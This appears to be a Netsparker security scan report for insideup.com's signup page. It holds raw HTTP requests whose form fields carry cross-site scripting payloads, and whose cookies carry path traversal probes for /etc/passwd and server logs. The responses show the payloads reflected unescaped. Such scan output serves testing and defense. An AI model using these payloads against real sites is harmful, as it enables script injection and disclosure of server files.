value="New York" >New York</option> <option value="Newark" >Newark</option> <option value="Oakland" >Oakland</option> <option value="Orlando" >Orlando</option> <option value="Philadelphia" >Philadelphia</option> <option value="Phoenix" >Phoenix</option> <option value="Pittsburgh" >Pittsburgh</option> <option value="Portland" >Portland</option> <option value="Raleigh" >Raleigh</option> <option value="San Diego" >San Diego</option> <option value="Sacramento" >Sacramento</option> <option value="San Antonio" >San Antonio</option> <option value="San Francisco" >San Francisco</option> <option value="San Jose" >San Jose</option> <option value="Seattle" >Seattle</option> <option value="St. Louis" >St. Louis</option> <option value="Tampa" >Tampa</option> <option value="Tucson" >Tucson</option> <option value="Tulsa" >Tulsa</option> <option value="Washington D.C." >Washington D.C.</option> </select> </div> </div> </div> <div> <div id="loginAndMemberContainer"> <form id="loginForm" method="post"> <input type="hidden" name="refererUrl" value=""> <div style="width:320px;height:55px;float:left;padding:10px 0 0 5px;"> <div> <div style="float:left;padding:0px 0 0 10px;"> <input style="border:1px solid #CCCCCC;height:20px;width:107px;padding:3px 0 0 3px;" name="username" type="text" value="username" onfocus="clearInput(this);" onkeypress="checkEnterKey(event)" tabindex="1"/> </div> <div style="float:left;padding:0px 0 0 8px;"> <input style="border:1px solid #CCCCCC;height:20px;width:107px;padding:3px 0 0 3px;" name="password" type="password" value="password" onfocus="clearInput(this);" onkeypress="checkEnterKey(event)" tabindex="2" /> </div> <div style="float:left;padding:0px 0 0 8px;"> <a href="javascript:void(0);" onclick="javascript:submitLogin();checkScreenWidth();" onkeypress="checkEnterKey(event)"><img src="/images/loginBtn.gif" border="0" onkeypress="checkEnterKey(event)" tabindex="4" alt="Login"/></a> </div> </div> <div style="float:left; padding:2px 0 0 0;"> <input type="hidden" name="_rememberme"> <div style="float:left;padding:0px 0 0 10px;"><input tabindex="3" type="checkbox" name="rememberme" value="true" /></div> <div style="float:left;padding:3px 0 0 2px;color:#777777;font-size:10px;font-weight:bold;">Remember Me</div> <div style="float:left;padding:3px 0 0 20px;color:#777777;font-size:10px; font-weight:bold;"> <a href="#" class="greyBs" onClick="showForgotPassword();">Password Reminder</a> </div> <div style="padding: 3px 0pt 0pt 10px; float: left;"><a href="/communitysignup.html" style="color:#777777; font-size: 10px; font-weight: bold;" class="greyBs">Register Now</a></div> </div> </div> </form> </div> <div style="float:left;padding:17px 0 0 0; width:110px;color:black;font-size:11px" id="blkShare"> <script type="text/javascript" src="http://w.sharethis.com/button/sharethis.js#tabs=web%2Cpost%2Cemail&amp;charset=utf-8&amp;style=default&amp;publisher=c17cda91-72c8-497c-bea7-a4d4698b5bb5&offsetLeft=-349"></script> </div> <img style="display:none;" src="/images/spacer.gif" onload="trackingPageContent('White Paper Form',0,'')" alt="" /> </div> </div> <div class="clear"></div> <div class="punchLine">Where Business Services Buyers & Sellers Connect</div> <div class="float-left" style="width:550px;"> <ul id="headerNav" class="headerNav headerAdvertiseActive"> <li class="headerHome"><a href="/index.html" onMouseOver="toggleHeader(0, 'headerHomeActive')" onMouseOut="toggleHeader(1, 'headerAdvertiseActive')">Home</a></li> <li class="headerAdvertise"><a href="/advertise.html" onMouseOver="toggleHeader(0, 'headerAdvertiseActive')" onMouseOut="toggleHeader(1, 'headerAdvertiseActive')">Advertise</a></li> <li class="headerPartner"><a href="/partner.html" onMouseOver="toggleHeader(0, 'headerPartnerActive')" onMouseOut="toggleHeader(1, 'headerAdvertiseActive')">Partner</a></li> <li class="headerAboutus"><a href="/aboutUs.html" onMouseOver="toggleHeader(0, 'headerAboutusActive')" onMouseOut="toggleHeader(1, 'headerAdvertiseActive')">About Us</a></li> <li class="headerResources"><a href="/communitymainpage.html" onMouseOver="toggleHeader(0, 'headerResourcesActive')" onMouseOut="toggleHeader(1, 'headerAdvertiseActive')">Resources</a></li> <li class="headerContactus"><a href="/contactUs.html" onMouseOver="toggleHeader(0, 'headerContactusActive')" onMouseOut="toggleHeader(1, 'headerAdvertiseActive')">Contact us</a></li> </ul> </div> <div class="clear"></div> </div> <div style="clear:both;"></div> <div id="forgotPasswordPopUpLayerBody" style="*left:15%;*top:18%;"></div> </div> <div class="clear"></div> <style>/* CSS Document */body{ line-height:18px; } #wrapper{ width:878px; margin:0 auto; padding-top:20px; } h11{ font:20px Verdana, Arial, Helvetica, sans-serif; margin:0px; padding:0px; } span.green{ color:#33a415; } h11 span.r{ font-size:14px; } h2{ font:bold 14px Verdana, Arial, Helvetica, sans-serif; color:#4f4f4f; margin:0px; padding:0; } h3{ font:bold 14px Verdana, Arial, Helvetica, sans-serif; color:#006cff; margin:0px; padding:0px; } h4{ font:bold 16px Verdana, Arial, Helvetica, sans-serif; color:#006cff; margin:0px; padding:0px; } .quote{ font:12px Verdana, Arial, Helvetica, sans-serif; line-height:20px; } .contentWrapper{ }/*--BOX BOX BOX--*/ .greyBox{ background:url(../images/box1.jpg) no-repeat left top #eeeeee; margin:15px 0; } .greyBox1{ background:url(../images/box2.jpg) no-repeat right top; } .greyBox2{ background:url(../images/box3.jpg) no-repeat right bottom; } .greyBox3{ background:url(../images/box4.jpg) no-repeat left bottom; padding:10px 15px; } .contactForm td{ padding:5px;}/*--BOX BOX BOX--*/ </style><div id="wrapper"><a class="secondaryAction" href="advertise.html" >Advertise</a> | <a class="secondaryAction" href="howitworks.html"> How It Works </a>|<a class="secondaryAction" style="margin-left:0;text-decoration:none;"><strong> Case Studies</strong> </a>|<a href="competitivecomparision.html" class="secondaryAction"> Competitive Comparison </a>|<a href="advertiserFAQs.html" class="secondaryAction"> Advertiser FAQs </a>|<a href="advertiserTerms.html" class="secondaryAction"> Advertiser Terms </a>|<a href="http://insideup.com/blogs/b2bleadgen" class="secondaryAction"> Marketing Blog </a>|<a href="marketingWhitepaper.html" class="secondaryAction"> Marketing Whitepaper </a><div class="contentWrapper"><table border="0" cellspacing="0" cellpadding="0"> <tr> <td scope="row" width="575"> <h11> <span style="font-size:15px;">TeleDirect Call Centers Case Study</span> |<a href="vocalocitycasestudy.html" style="font-size:15px;"> Vocalocity Voice Over IP Case Study</a> </h11> <br/><br/> <h2>The Leader in Call Center Services for Business Joins Forces with InsideUp to Dramatically Increase Sales Leads & Conversions</h2> <div> <div class="greyBox"> <div class="greyBox1"> <div class="greyBox2"> <div class="greyBox3"> <h3>InsideUp Client Overview</h3> TeleDirect Call Centers has been supporting the business community with outstanding call center services for 50 years and has grown into today's advanced, full-service provider of choice. TeleDirect employs more than 100 professional, courteous CSRs who present first-rate impressions for clients, and the firm deploys cutting-edge technology to handle any call volume. The firm has been on the Sacramento Business Journal's "Fastest Growing Companies" list for six consecutive years!</div> </div> </div> </div> </div> <img src="/images/partition_dash_bar.jpg" /> <img src="/images/tldr.jpg" alt="banner" border="0" usemap="#Map" /> <div class="quote"><span class="green">"</span>InsideUp far exceeded our expectations. InsideUp leads were not only qualified and verified..they were either warm or hot to the touch! Plus they were exactly the prospects that hit our sweet spot. Thanks to InsideUp, our business has grown significantly<span class="green">"</span> <strong style="color:#0066FF; display:block;">Tom Coshow, CEO TeleDirect</strong></div> <img src="/images/partition_dash_bar.jpg" /></td> <td valign="top" style=" padding-left:18px;"> <div style="padding:10px; background:#87baff; font:11px Verdana, Arial, Helvetica, sans-serif; line-height:18px;"> <form method="post" action="/whitePapaper.html"> <input type="hidden" name="src" value="teledirectcasestudy"> <input type="hidden" name="parentPage" value="3"> <table class="contactForm" cellpadding="5"> <tr> <td colspan="2" class="head"><span style="color: #000; font-family: Arial,Helvetica,sans-serif; font-size: 17px; font-weight: bold; line-height:20px;">To get more information about becoming a marketing partner of InsideUp, complete and submit the form below:</span></td> </tr> <tr> <td width="108" style="width: 100px;">First Name</td> <td width="144" style="text-align: left;"> <input name="firstName" type="text" value="Smith"/> </td> </tr> <tr> <td>Last Name</td> <td> <input name="lastName" type="text" value="Smith"/> </td> </tr> <tr> <td>Company</td> <td> <input name="company" type="text" value="3"/> </td> </tr> <tr> <td>Phone Number</td> <td> <input name="phone" type="text" value="3"/> </td> </tr> <tr> <td>Email Address</td> <td> <input name="email" type="text" value="netsparker@example.com"/> </td> </tr> <tr> <td>Website</td> <td> <input name="url" type="text" value="'"--></style></script><script>netsparker(0x001228)</script>"> </td> </tr> <tr> <td>Your Company's <br> Services?</td> <td align="left" valign="top"&g..
- /communitysignup.html

/communitysignup.html CONFIRMED

http://www.insideup.com/communitysignup.html

Parameters

Parameter Type Value
refererUrl POST '"--></style></script><script>alert(0x0012F8)</script>
pseudonym POST 3
emailAddress POST netsparker@example.com
firstName POST Smith
lastName POST Smith
companyName POST Smith
password1 POST 3
password2 POST 3

Request

POST /communitysignup.html HTTP/1.1
Referer: http://www.insideup.com/communitysignup.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.insideup.com
Cookie: OAVARS[../../../../../../../../../../proc/self/fd/2\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Content-Length: 219
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

refererUrl='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x0012F8)%3c%2fscript%3e&pseudonym=3&emailAddress=netsparker%40example.com&firstName=Smith&lastName=Smith&companyName=Smith&password1=3&password2=3

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:41:19 GMT
Server: Apache/2.2.9 (Fedora)
Set-Cookie: JSESSIONID=214D1B52E896811CC41F4B0ACFA88438; Path=/
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache,no-store
Content-Language: en-US
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html;charset=ISO-8859-1


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /> <meta name="keywords" content="InsideUp, business, wiki, advertise, business category, vendors, ratings, business service, technology, leads, community, social networking, referral, reference, share, San Diego, commerce, b2b, trade, industry, selling, production, big business, dealing, corporation, conglomerate, establishment, partnership, firm, multinational, transnational, small business, enterprise, venture, organization, transaction, contract, commercial, occupational, corporate, publicize, market, search, forum, forums, discuss, share, information"/> <meta name="description" content="Join your community and share your services!"/> <meta name="robots" content="index; follow"/> <title>Share your services and experiences with your community.</title> <link rel="stylesheet" type="text/css" href="/css/mainNewInsideup.css" />
<link rel="stylesheet" type="text/css" href="/css/calendar.css" /> <script type="text/javascript" src="/js/jquery-1.2.1.js"></script> <script type="text/javascript" src="/js/ajax.js"></script> <script type="text/javascript" src="/js/ajax-dynamic-list.js"></script> <script type="text/javascript" src="/js/default.js"></script> <script type="text/javascript" src="/js/calendar.js" ></script> <script type="text/javascript"> var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www."); document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E")); </script> <script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-5083151-1"); pageTracker._setDomainName(".insideup.com"); pageTracker._trackPageview(); } catch(err) {} </script></head><body> <div id="mainContainer">
<!--Header Start's Here--> <div class="header"> <!---put header section here--> <script language="javascript">function clearInput(e){if(e.value=='username'||e.value=='password'){e.value="";} }</script> <style>.c_767676, a.c_767676:link, a.c_767676:visited { color:#767676; text-decoration:none; font:bold 14px Arial;}a.c_767676:hover { color:#767676; text-decoration:underline; font:bold 14px Arial;}</style> <div class="h-container"> <div> <div class="float-left logo"><a href="/index.html"><img src="/images/logo.png" alt="InsideUp Logo" width="157" height="78"></a></div> <div style="float:left;padding:10px 0 0 10px;"> <div style="float:left;padding:7px 0px 0 0;font-size:11px;color:#777777;font-weight:bold;">Your City:</div> <div style="float:left;padding:0px 0 0 7px; width:123px;color:#2B70CD;font-weight:bold;font-size:9px;"> <div style="float:left;width:135px; padding:2px 10px 0 0;"> <select style="width:128px;color:#2B70CD;font-weight:bold;font-size:9px;" id="cityselectbox" name="cityselectbox" onchange="updateUserSessionCity();"> <option value="Albuquerque" >Albuquerque</option> <option value="Atlanta" >Atlanta</option> <option value="Austin" >Austin</option> <option value="Baltimore" >Baltimore</option> <option value="Boston" >Boston</option> <option value="Charlotte" >Charlotte</option> <option value="Chicago" >Chicago</option> <option value="Cincinnati" >Cincinnati</option> <option value="Cleveland" >Cleveland</option> <option value="Columbus" >Columbus</option> <option value="Dallas" selected=selected >Dallas</option> <option value="Denver" >Denver</option> <option value="Detroit" >Detroit</option> <option value="El Paso" >El Paso</option> <option value="Fort Worth" >Fort Worth</option> <option value="Fresno" >Fresno</option> <option value="Honolulu" >Honolulu</option> <option value="Houston" >Houston</option> <option value="Indianapolis" >Indianapolis</option> <option value="Jacksonville" >Jacksonville</option> <option value="Kansas City" >Kansas City</option> <option value="Las Vegas" >Las Vegas</option> <option value="Los Angeles" >Los Angeles</option> <option value="Memphis" >Memphis</option> <option value="Mesa" >Mesa</option> <option value="Miami" >Miami</option> <option value="Milwaukee" >Milwaukee</option> <option value="Minneapolis-St. Paul" >Minneapolis-St. Paul</option> <option value="Nashville" >Nashville</option> <option value="New Orleans" >New Orleans</option> <option value="New York" >New York</option> <option value="Newark" >Newark</option> <option value="Oakland" >Oakland</option> <option value="Orlando" >Orlando</option> <option value="Philadelphia" >Philadelphia</option> <option value="Phoenix" >Phoenix</option> <option value="Pittsburgh" >Pittsburgh</option> <option value="Portland" >Portland</option> <option value="Raleigh" >Raleigh</option> <option value="San Diego" >San Diego</option> <option value="Sacramento" >Sacramento</option> <option value="San Antonio" >San Antonio</option> <option value="San Francisco" >San Francisco</option> <option value="San Jose" >San Jose</option> <option value="Seattle" >Seattle</option> <option value="St. Louis" >St. Louis</option> <option value="Tampa" >Tampa</option> <option value="Tucson" >Tucson</option> <option value="Tulsa" >Tulsa</option> <option value="Washington D.C." >Washington D.C.</option> </select> </div> </div> </div> <div> <div id="loginAndMemberContainer"> <form id="loginForm" method="post"> <input type="hidden" name="refererUrl" value="'"--></style></script><script>netsparker(0x0012F8)</script>"> <div style="width:320px;height:55px;float:left;padding:10px 0 0 5px;"> <div> <div style="float:left;padding:0px 0 0 10px;"> <input style="border:1px solid #CCCCCC;height:20px;width:107px;padding:3px 0 0 3px;" name="username" type="text" value="username" onfocus="clearInput(this);" onkeypress="checkEnterKey(event)" tabindex="1"/> </div> <div style="float:left;padding:0px 0 0 8px;"> <input style="border:1px solid #CCCCCC;height:20px;width:107px;padding:3px 0 0 3px;" name="password" type="password" value="password" onfocus="clearInput(this);" onkeypress="checkEnterKey(event)" tabindex="2" /> </div> <div style="float:left;padding:0px 0 0 8px;"> <a href="javascript:void(0);" onclick="javascript:submitLogin();checkScreenWidth();" onkeypress="checkEnterKey(event)"><img src="/images/loginBtn.gif" border="0" onkeypress="checkEnterKey(event)" tabindex="4" alt="Login"/></a> </div> </div> <div style="float:left; padding:2px 0 0 0;"> <input type="hidden" name="_rememberme"> <div style="float:left;padding:0px 0 0 10px;"><input tabindex="3" type="checkbox" name="rememberme" value="true" /></div> <div style="float:left;padding:3px 0 0 2px;color:#777777;font-size:10px;font-weight:bold;">Remember Me</div> <div style="float:left;padding:3px 0 0 20px;color:#777777;font-size:10px; font-weight:bold;"> <a href="#" class="greyBs" onClick="showForgotPassword();">Password Reminder</a> </div> <div style="padding: 3px 0pt 0pt 10px; float: left;"><a href="/communitysignup.html" style="color:#777777; font-size: 10px; font-weight: bold;" class="greyBs">Register Now</a></div> </div> </div> </form> </div> <div style="float:left;padding:17px 0 0 0; width:110px;color:black;font-size:11px" id="blkShare"> <script type="text/javascript" src="http://w.sharethis.com/button/sharethis.js#tabs=web%2Cpost%2Cemail&amp;charset=utf-8&amp;style=default&amp;publisher=c17cda91-72c8-497c-bea7-a4d4698b5bb5&offsetLeft=-349"></script> </div> <img style="display:none;" src="/images/spacer.gif" onload="trackingPageContent('Community Signup',0,'')" alt="Home" /> </div> </div> <div class="clear"></div> <div class="punchLine">Where Business Services Buyers & Sellers Connect</div> <div class="float-left" style="width:550px;"> <ul id="headerNav" class="headerNav headerHomeActive"> <li class="headerHome"><a href="/index.html" onMouseOver="toggleHeader(0, 'headerHomeActive')" onMouseOut="toggleHeader(1, 'headerHomeActive')">Home</a></li> <li class="headerAdvertise"><a href="/advertise.html" onMouseOver="toggleHeader(0, 'headerAdvertiseActive')" onMouseOut="toggleHeader(1, 'headerHomeActive')">Advertise</a></li> <li class="headerPartner"><a href="/partner.html" onMouseOver="toggleHeader(0, 'headerPartnerActive')" onMouseOut="toggleHeader(1, 'headerHomeActive')">Partner</a></li> <li class="headerAboutus"><a href="/aboutUs.html" onMouseOver="toggleHeader(0, 'headerAboutusActive')" onMouseOut="toggleHeader(1, 'headerHomeActive')">About Us</a></li> <li class="headerResources"><a href="/communitymainpage.html" onMouseOver="toggleHeader(0, 'headerResourcesActive')" onMouseOut="toggleHeader(1, 'headerHomeActive')">Resources</a></li> <li class="headerContactus"><a href="/contactUs.html" onMouseOver="toggleHeader(0, 'headerContactusActive')" onMouseOut="toggleHeader(1, 'headerHomeActive')">Contact us</a></li> </ul> </div> <div class="clear"></div> </div> <div style="clear:both;"></div> <div id="forgotPasswordPopUpLayerBody" style="*left:15%;*top:18%;"></div> </div> <!--Header End's Here--> <!--Mid Container Start's Here--> <div id="midSectionBox"> <!--midsection part starts--> <script type="text/javascript"> function invertValue(y){ var x=document.getElementById(y).value if(x==0) { document.getElementById(y).value=1 } if(x==1) { document.getElementById(y).value=0 }}</script><div style="background:url(/images/midSliceMain.gif);"> <div style="width:850px; height:740px; margin:auto; padding-top:20px;"> <!-----left Section--------> <div style="width:530px; height:auto; float:left;"> <div id="communityLogin"> <div style="width:492px; height:84px; border:1px solid #eeeeee;"> <form method="post" id="communityLoginId"> <input type="hidden" name="refererUrl" value="'"--></style></script><script>netsparker(0x0012F8)</script>"> <table width="96%" border="0" align="right" cellpadding="0" cellspacing="0"> <tr> <td width="27%" height="70" style="font:bold 12px Arial, Helvetica, sans-serif; color:#777777;">Already A Member?</td> <td width="53%" valign="bottom" style="font:bold 12px Arial, Helvetica, sans-serif; color:#777777; padding-top:22px;">&nbsp; <input name="username" value="username" type="text" onclick="clearInput(this);" onfocus="clearInput(this);" id="textfield" style="width:110px; padding:3px 0 0 3px; height:20px; border:1px solid #cccccc; margin-left:5px;" onkeypress="checkEnterKey(event)" /> <input type="password" name="password" id="textfield" style="width:110px; height:22px; border:1px solid #cccccc; padding:3px 0 0 3px; height:20px; margin-left:5px;" value="password" onclick="clearInput(this);" onfocus="clearInput(this);" onkeypress="checkEnterKey(event)" /> <span style="padding-left: 10px; line-height: 12px;"> <input type="hidden" name="_rememberme"> <input type="checkbox" name="rememberme" id="checkbox" value="true" /> <span style="color:#777777;font-size:10px;font-weight:bold;text-decoration:none;">Remember Me</span> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <a href="#" class="greyBs" onClick="showForgotPassword();">Password Reminder</a> </span> </td> <td width="22%" style="padding-top:6px;">&nbsp; <a href="javascript:void(0);" onclick="javascript:submitCommunityLogin();checkScreenWidth();"><img src="images/ComunityLogin.png" border="0" alt="Login"/></a> </td> </tr> </table> </form> </div> </div> <form method="post" action="communitysignup.html"> <input type="hidden" name="refererUrl" value='&#039;&#034;--&gt;&lt;/style&gt;&lt;/script&gt;&lt;script&gt;netsparker(0x0012F8)&lt;/script&gt;'/> <div> <table width="496" border="0" cellspacing="0" cellpadding="0" style="margin-top:20px;"> <tr> <td colspan="2" style="font:bold 22px Arial, Helvetica, sans-serif; color:#181818;">Create Your Free Account</td> </tr> <tr> <td height="24" colspan="2" style="font:normal 12px Arial, Helvetica, sans-serif; color:#181818;">To gain free access to the InsideUp community please complete this short registration.</td> </tr> <tr> <td width="131" height="50" align="right" style="font:normal 12px Arial, Helvetica, sans-serif; color:#212121">Username <span style="color:#dc0000">*</span></td> <td width="365"> <input type="text" name="pseudonym" value="3" id="pseudonym" style="width:280px; height:18px; padding-top:3px; margin-left:10px;" class="inputbox123 " /> </td> </tr> <tr> <td height="50" align="right" style="font:normal 12px Arial, Helvetica, sans-serif; color:#212121">Email <span style="color:#dc0000">*</span></td> <..
- /communitysignup.html

/communitysignup.html CONFIRMED

http://www.insideup.com/communitysignup.html

Parameters

Parameter Type Value
refererUrl POST http://www.insideup.com/index.html
pseudonym POST '"--></style></script><script>alert(0x001312)</script>
emailAddress POST netsparker@example.com
firstName POST Smith
lastName POST Smith
companyName POST Smith
password1 POST 3
password2 POST 3

Request

POST /communitysignup.html HTTP/1.1
Referer: http://www.insideup.com/communitysignup.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.insideup.com
Cookie: OAVARS[../../../../../../../../../../proc/self/fd/2\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 